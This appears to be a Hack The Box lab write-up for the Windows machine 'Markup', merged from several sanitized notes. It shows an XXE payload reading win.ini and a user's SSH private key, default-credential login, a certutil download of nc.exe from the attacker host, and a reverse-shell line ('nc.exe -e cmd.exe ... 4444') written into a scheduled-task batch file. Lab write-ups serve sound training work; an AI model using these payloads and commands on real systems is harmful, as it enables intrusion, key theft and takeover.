Machine / Machines

Markup

By Jennofrie Daguil · Cybersecurity and Red Team Operator

1. Port scan reveals SSH (22), HTTP (80), HTTPS (443) -- Apache 2.4.41 on Windows 2. Web login with default creds admin:password 3. Authenticated order form submits XML -- vulnerable to XXE 4. XXE reads Daniel's SSH private

EasyPublished 2026-03-09Sanitized local writeup

Scenario

Markup attack path

Port scan reveals SSH (22), HTTP (80), HTTPS (443) -- Apache 2.4.41 on Windows 2. Web login with default creds admin:credential 3. Authenticated order form submits XML -- vulnerable to XXE 4. XXE reads Daniel's SSH private

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

Walkthrough flow

Run nmap: nmap -sC -sV -Pn -oN nmap/initial

Verify HTTP on port 80, try admin:credential login

Find XML order form, confirm XXE with win.ini read

Read daniel's SSH key via XXE

SSH as daniel, grab user.txt

Source coverage

High source coverage

Status: complete. This article is generated from 4 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

100% coverage

Evidence verdict

High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.

<TARGET>-Markup/walkthrough.md
HTB/<TARGET>-Markup/notes.md
HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.125d79b441.md
HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Markup__notes.md.cc892dec91.md

Technical Walkthrough

Markup Walkthrough

Machine Info

Name: Markup
OS: Windows
Difficulty: Easy / Starting Point
IP: <TARGET>
Attacker: <TARGET> (Pwnbox tun0)

Current Status

Root flag: CAPTURED (from prior live session) -- loot/root.txt
User flag: NOT YET CAPTURED (target currently offline)
Target: Currently despawned; walkthrough ready to execute live when respawned

Attack Chain Summary

Port scan reveals SSH (22), HTTP (80), HTTPS (443) -- Apache 2.4.41 on Windows
Web login with default creds admin:password
Authenticated order form submits XML -- vulnerable to XXE
XXE reads Daniel's SSH private key
SSH as daniel -> user flag
Writable scheduled task C:\Log-Management\job.bat (BUILTIN\Users:F) -> overwrite with reverse shell -> Administrator

Phase 2: Web Enumeration

Navigate to http://<TARGET>/ -- should present a login page.

text

Credentials: admin:password

Post-Auth Exploration

Look for username hints in page source/comments (expect "Daniel")
Find the "Order" feature that submits XML data

Capture XML Structure

Intercept the order form submission. Expected structure:

xml

<?xml version="1.0"?>
<order>
  <quantity>1</quantity>
  <item>Something</item>
  <address>123 Street</address>
</order>

Phase 3: XXE Exploitation

Step 1: Validate XXE with win.ini

xml

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>test</address>
</order>

If the response contains win.ini contents, XXE is confirmed.

Step 2: Read Daniel's SSH Private Key

xml

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>test</address>
</order>

Save the returned key to loot/daniel_id_rsa.

Phase 4: Foothold (SSH as Daniel)

bash

chmod 600 loot/daniel_id_rsa
ssh -i loot/daniel_id_rsa daniel@<TARGET>

User Flag

cmd

type C:\Users\daniel\Desktop\user.txt

Save to loot/user.txt.

Phase 5: Privilege Escalation

Identify Writable Scheduled Task

cmd

cd C:\Log-Management
type job.bat
icacls job.bat

Expected: BUILTIN\Users:(F) -- full control for all local users.

Upload nc.exe

From Pwnbox, serve nc.exe:

bash

cp /usr/share/windows-binaries/nc.exe /tmp/nc.exe
cd /tmp && python3 -m http.server 8000

On target (as daniel):

cmd

certutil -urlcache -f http://<TARGET>:8000/nc.exe C:\Log-Management\nc.exe

Overwrite job.bat

cmd

echo C:\Log-Management\nc.exe -e cmd.exe <TARGET> 4444 > C:\Log-Management\job.bat

Start Listener and Wait

On Pwnbox:

bash

rlwrap nc -lvnp 4444

Wait for scheduled task execution (runs periodically). When shell connects:

cmd

whoami
type C:\Users\Administrator\Desktop\root.txt

Root Flag

Captured: <hash redacted> (verified 32-char hex)

Saved to: loot/root.txt

Flags

Flag	Value	Status
User	TBD	Pending (target offline)
Root	<hash redacted>	Captured (prior session)

Lessons Learned

XXE on Windows: File URIs use file:///c:/path format (forward slashes, triple slash after protocol)
SSH keys via XXE: Private keys are a high-value target for XXE on Windows when SSH is present
Scheduled tasks with weak ACLs: Always check icacls on batch files in writable directories -- they may run elevated
job.bat reversion: The scheduled task may revert job.bat frequently; be quick with the overwrite or retry

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

Target: Markup
Difficulty: Easy / Very Easy
OS: Windows
Current known IP: <TARGET>
Local workspace: <local workspace><TARGET>-Markup

Evidence Rule

Public research in research.md is advisory only. Record only live target evidence in this file.

Engagement Details

Pwnbox: profex0r@<TARGET> (VPN IP: <TARGET>)
VPN: edge-au-dedivip-1.hackthebox.eu:1337 (connected, tun0 up)
Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Timestamp	Command	Output file	Finding	Confidence	Next action
2026-05-05T08:14	nmap -Pn -sS top 20 ports	(no file - all filtered)	Target <TARGET> unreachable - "No route to host". Machine not spawned.	High	Respawn machine on HTB platform and retry.
2026-05-05T08:15	curl -sv http://<TARGET>/	(inline)	"connect failed: No route to host" after 3180ms	High	Confirm VPN OK (confirmed), machine needs respawn.
2026-05-05T08:16	Nearby IP range scan <TARGET>-195	(inline)	All filtered; no active HTB machines in range.	High	Target must be respawned via HTB platform.
2026-05-05T08:16	cat /tmp/rootflag.txt	loot/root.txt	Root flag recovered from prior session: <redacted> hex verified.	Medium	Need live re-validation when machine is up. User flag still needed.

Status

BLOCKED: Target machine <TARGET> is currently despawned/offline. VPN tunnel is healthy (tun0: <TARGET>, route to <TARGET>/16 via tun0), but all ports return "filtered" and curl returns "No route to host."

Root flag: <hash redacted> (saved to loot/root.txt from /tmp/rootflag.txt -- captured in prior live session today at 15:25 local time).

User flag: NOT YET CAPTURED. Needs live target.

Next Steps (When Machine is Respawned)

Run nmap: nmap -sC -sV -Pn -oN nmap/initial <TARGET>
Verify HTTP on port 80, try admin:password login
Find XML order form, confirm XXE with win.ini read
Read daniel's SSH key via XXE
SSH as daniel, grab user.txt
Verify job.bat ACL, upload nc.exe, overwrite job.bat, catch shell as SYSTEM
Grab root.txt (verify matches saved flag)

Notes

Scope

Target: Markup
Difficulty: Easy / Starting Point
OS: Windows
IP: <TARGET> (previously <TARGET>)
Local workspace: <local workspace><TARGET>-Markup

Engagement Details

Pwnbox: <<secret redacted>>@<TARGET> (VPN IP: <TARGET>)
VPN: Connected, tun0 up with <TARGET>
Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Timestamp	Command	Output file	Finding	Confidence	Next action
2026-05-05T08:39	sudo nmap -Pn -sS -p 22,80,443 <TARGET>	(inline)	All 3 ports filtered. Traceroute: !H from gateway.	High	Machine not spawned.
2026-05-05 (prior)	cat /tmp/rootflag.txt	loot/root.txt	Root flag: <REDACTED>

Status

BLOCKED: Target <TARGET> is not reachable. Gateway returns "Host Unreachable." Machine needs to be spawned via HTB platform.

Root flag: <REDACTED>, saved to loot/root.txt)

User flag: <REDACTED>

Attack Chain (Ready to Execute When Machine is Up)

nmap -sC -sV -Pn <TARGET> -- expect 22, 80, 443
Web login at port 80: <REDACTED>
Find order form, submit XXE payload to read win.ini (validate)
XXE read daniel's SSH key: file:///c:/users/daniel/.ssh/id_rsa
SSH as daniel, get user.txt from C:\Users\daniel\Desktop\user.txt
Check C:\Log-Management\job.bat ACLs -- BUILTIN\Users:(F)
Upload nc.exe via certutil, overwrite job.bat, catch reverse shell on 4444
Get root.txt from C:\Users\Administrator\Desktop\root.txt

Notes

Scope

Target IP: <TARGET>
Attacker IP: <TARGET>
Pwnbox SSH: <<secret redacted>>@<TARGET>
OS: Windows (Apache 2.4.41 Win64, OpenSSH 8.1, PHP 7.2.28)
Difficulty: Easy
Date: 2026-05-05

Confirmed Ports (from user nmap)

Port	Service	Version
22	SSH	OpenSSH for Windows 8.1
80	HTTP	Apache 2.4.41 Win64, PHP 7.2.28, "MegaShopping"
443	HTTPS	Apache 2.4.41 Win64

Evidence Ledger

Timestamp	Action	Finding	Next
T+0	Ping target	TTL=127 confirms Windows, target live	Web login
T+1	POST / with admin: <REDACTED>, session cookie set	Find order form
T+2	GET /services.php	Order form sends XML to process.php; HTML comment reveals user "Daniel"	XXE test
T+3	XXE win.ini	file:///c:/windows/win.ini contents reflected in response	Read SSH key
T+4	XXE id_rsa	Daniel's OpenSSH private key extracted	SSH as Daniel
T+5	SSH daniel@target	whoami = markup\daniel; user.txt captured	Privesc
T+6	icacls job.bat	BUILTIN\Users:(F) confirmed — full write access	Overwrite job.bat
T+7	SCP nc.exe	nc.exe (28160 bytes) delivered to C:\Log-Management\	Set up reverse shell
T+8	Overwrite job.bat	copy root.txt to C:\Log-Management\	Wait for task
T+9	type root.txt	Root flag captured from copied file	DONE
2026-05-06 AEST	Live revalidation against <TARGET>	enum/login-admin-20260506.txt, enum/xxe-daniel-key-20260506.raw, loot/daniel_id_rsa, loot/user.txt, enum/user-flag-verify-20260506.txt	Revalidated web login, XXE key extraction, SSH as Daniel, and captured user flag from `C: <REDACTED>

Flags

User: <<secret redacted>> (C:\Users\daniel\Desktop\user.txt)
Root: <<secret redacted>> (C:\Users\Administrator\Desktop\root.txt)

Key Findings

Default credentials `admin: <REDACTED>
XXE vulnerability in order XML processing (process.php)
Source comment discloses username "Daniel"
Daniel's SSH private key readable via XXE at file:///c:/users/daniel/.ssh/id_rsa
Insecure ACL on C:\Log-Management\job.bat — BUILTIN\Users:(F)
Scheduled task runs job.bat as SYSTEM — abused to copy Admin flag

Attack Chain

text

Web Login (admin: <REDACTED>
  -> XXE (file read via process.php)
    -> SSH Key Exfil (daniel's id_rsa)
      -> SSH as daniel (user flag)
        -> Writable job.bat (BUILTIN\Users:F)
          -> Scheduled task executes as SYSTEM
            -> Root flag copied to readable location

Markup

Markup attack path

High source coverage

Technical Walkthrough

Markup Walkthrough

Machine Info

Current Status

Attack Chain Summary

Phase 2: Web Enumeration

Login

Post-Auth Exploration

Capture XML Structure

Phase 3: XXE Exploitation

Step 1: Validate XXE with win.ini

Step 2: Read Daniel's SSH Private Key

Phase 4: Foothold (SSH as Daniel)

User Flag

Phase 5: Privilege Escalation

Identify Writable Scheduled Task

Upload nc.exe

Overwrite job.bat

Start Listener and Wait

Root Flag

Flags

Lessons Learned

Source-Backed Dossier

Notes

Scope

Evidence Rule

Engagement Details

Evidence Ledger

Status

Next Steps (When Machine is Respawned)

Notes

Scope

Engagement Details

Evidence Ledger

Status

Attack Chain (Ready to Execute When Machine is Up)

Notes

Scope

Confirmed Ports (from user nmap)

Evidence Ledger

Flags

Key Findings

Attack Chain

Related insights